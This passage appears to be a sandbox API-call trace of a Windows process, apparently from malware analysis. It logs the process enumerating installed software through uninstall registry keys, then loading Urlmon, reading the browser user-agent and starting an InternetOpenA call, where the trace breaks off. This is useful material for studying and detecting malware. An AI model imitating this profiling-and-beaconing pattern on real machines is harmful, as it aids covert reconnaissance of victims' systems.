returned 0x47a0e30 [0146.747] RegQueryValueExW (in: hKey=0x2cc, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x31, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47a4a40 [0146.747] RegQueryValueExW (in: hKey=0x2cc, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x31, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x24) returned 0x479a9e0 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798c90 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d18 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0bb0 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2c) returned 0x47a49d0 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0cf0 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xc) returned 0x479ec58 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0ed0 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798c10 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x28) returned 0x479aa10 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798a90 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798af0 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47a0e08 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798ad0 [0146.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798b10 [0146.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e30 [0146.748] RegQueryValueExW (in: hKey=0x2cc, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c50 [0146.748] RegQueryValueExW (in: hKey=0x2cc, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0bd8 [0146.748] RegQueryValueExW (in: hKey=0x2cc, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b38 [0146.748] RegQueryValueExW (in: hKey=0x2cc, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e30 [0146.748] RegQueryValueExW (in: hKey=0x2cc, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a16c0 [0146.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47a1770 [0146.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1810 [0146.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47a1820 [0146.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a16d0 [0146.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47a16f0 [0146.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a15b0 [0146.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e80 [0146.748] RegQueryValueExW (in: hKey=0x2cc, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0xe0, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0a98 [0146.748] RegQueryValueExW (in: hKey=0x2cc, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x36, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.748] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a1dc0 [0146.748] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-008C-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2d0) returned 0x0 [0146.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1810 [0146.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b38 [0146.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47a4880 [0146.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x24) returned 0x479a980 [0146.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798a90 [0146.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e80 [0146.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0bd8 [0146.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2c) returned 0x47a4ae8 [0146.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b38 [0146.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xc) returned 0x479ebf8 [0146.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c50 [0146.749] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798ad0 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x28) returned 0x479a6b0 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798af0 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798b10 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47a0b10 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798b30 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798b70 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0cf0 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0cf0 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0ac0 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d90 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0a70 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1770 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47a1820 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a16f0 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47a16c0 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a16d0 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47a1680 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1670 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0a98 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0db8 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a24a0 [0146.750] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-0090-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2d4) returned 0x0 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1820 [0146.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e30 [0146.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a1d10 [0146.751] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-00A1-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2d8) returned 0x0 [0146.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a16c0 [0146.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e08 [0146.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a1f78 [0146.751] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-00BA-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2dc) returned 0x0 [0146.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a16d0 [0146.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0bb0 [0146.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2340 [0146.751] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-00E1-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2e0) returned 0x0 [0146.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a16f0 [0146.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0ed0 [0146.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a1c08 [0146.751] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-00E2-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2e4) returned 0x0 [0146.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1770 [0146.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0bd8 [0146.751] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a25a8 [0146.752] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-0115-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2e8) returned 0x0 [0146.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a14e0 [0146.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d90 [0146.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a1c08 [0146.752] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-0117-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2ec) returned 0x0 [0146.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1600 [0146.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0cf0 [0146.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a25a8 [0146.752] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-012B-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2f0) returned 0x0 [0146.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a16b0 [0146.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b38 [0146.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2080 [0146.752] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2f4) returned 0x0 [0146.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1670 [0146.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0cf0 [0146.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47a4a40 [0146.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47a4ce0 [0146.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a1f20 [0146.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0bd8 [0146.752] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798af0 [0146.753] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e08 [0146.753] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47a4ca8 [0146.753] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x48) returned 0x47926b0 [0146.753] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x47a4e60 [0146.753] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0ed0 [0146.753] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x90) returned 0x47a4f98 [0146.753] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0bb0 [0146.753] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0a48 [0146.753] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47a4880 [0146.753] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x46) returned 0x4792340 [0146.753] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2448 [0146.753] RegOpenKeyExW (in: hKey=0x21c, lpSubKey="6E815EB96CCE9A53884E7857C57002F0", ulOptions=0x0, samDesired=0x20019, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2f8) returned 0x0 [0146.753] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a14c0 [0146.753] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b10 [0146.753] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x80) returned 0x47a4e60 [0146.753] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b10 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e30 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x80) returned 0x47a4f98 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x80) returned 0x47a2fe0 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0bb0 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0cf0 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b10 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e58 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e08 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x80) returned 0x47a3068 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x80) returned 0x47a30f0 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d90 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x80) returned 0x47a3068 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d18 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x384) returned 0x47a5100 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2080 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2028 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e08 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd0) returned 0x47a5490 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x80) returned 0x47a1930 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b10 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xb0) returned 0x47a19b8 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x80) returned 0x47a1a70 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d40 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xb0) returned 0x47a58b0 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x90) returned 0x47a5968 [0146.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c50 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xb0) returned 0x47a5a00 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x90) returned 0x47a5ab8 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e30 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xb0) returned 0x47a5b50 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x47a1af8 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e58 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x80) returned 0x47a1898 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e80 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a1f20 [0146.755] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{B175520C-86A2-35A7-8619-86DC379688B9}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2f8) returned 0x0 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a15f0 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b88 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a22e8 [0146.755] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2fc) returned 0x0 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1660 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b60 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2188 [0146.755] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x300) returned 0x0 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1680 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0a98 [0146.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47a46f8 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x24) returned 0x479a6b0 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798a90 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0ea8 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c00 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2c) returned 0x47a4928 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0cf0 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xc) returned 0x479edc0 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b38 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798ad0 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x28) returned 0x479a9e0 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798af0 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798b10 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47a0c28 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798b70 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798bd0 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0a48 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b60 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a09f8 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c78 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x80) returned 0x47a4e60 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0ed0 [0146.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0a98 [0146.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x24) returned 0x479a830 [0146.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798a90 [0146.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c00 [0146.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0cf0 [0146.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2c) returned 0x47a4810 [0146.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b88 [0146.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xc) returned 0x479eb98 [0146.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0ea8 [0146.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798ad0 [0146.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x28) returned 0x479a6b0 [0146.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798af0 [0146.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798b10 [0146.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47a0ed0 [0146.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798bd0 [0146.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798b30 [0146.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c28 [0146.962] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0147.008] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3f90 | out: hHeap=0x4780000) returned 1 [0147.008] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3ea0 | out: hHeap=0x4780000) returned 1 [0147.008] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3ed0 | out: hHeap=0x4780000) returned 1 [0147.008] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3ea0 | out: hHeap=0x4780000) returned 1 [0147.008] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3dd0 | out: hHeap=0x4780000) returned 1 [0147.008] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479eca0 | out: hHeap=0x4780000) returned 1 [0147.008] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ee08 | out: hHeap=0x4780000) returned 1 [0147.008] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798a90 | out: hHeap=0x4780000) returned 1 [0147.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0ae8 | out: hHeap=0x4780000) returned 1 [0147.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a7828 | out: hHeap=0x4780000) returned 1 [0147.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a7a20 | out: hHeap=0x4780000) returned 1 [0147.009] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0147.049] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0147.376] FreeLibrary (hLibModule=0x71780000) returned 1 [0147.382] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c50 | out: hHeap=0x4780000) returned 1 [0147.382] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 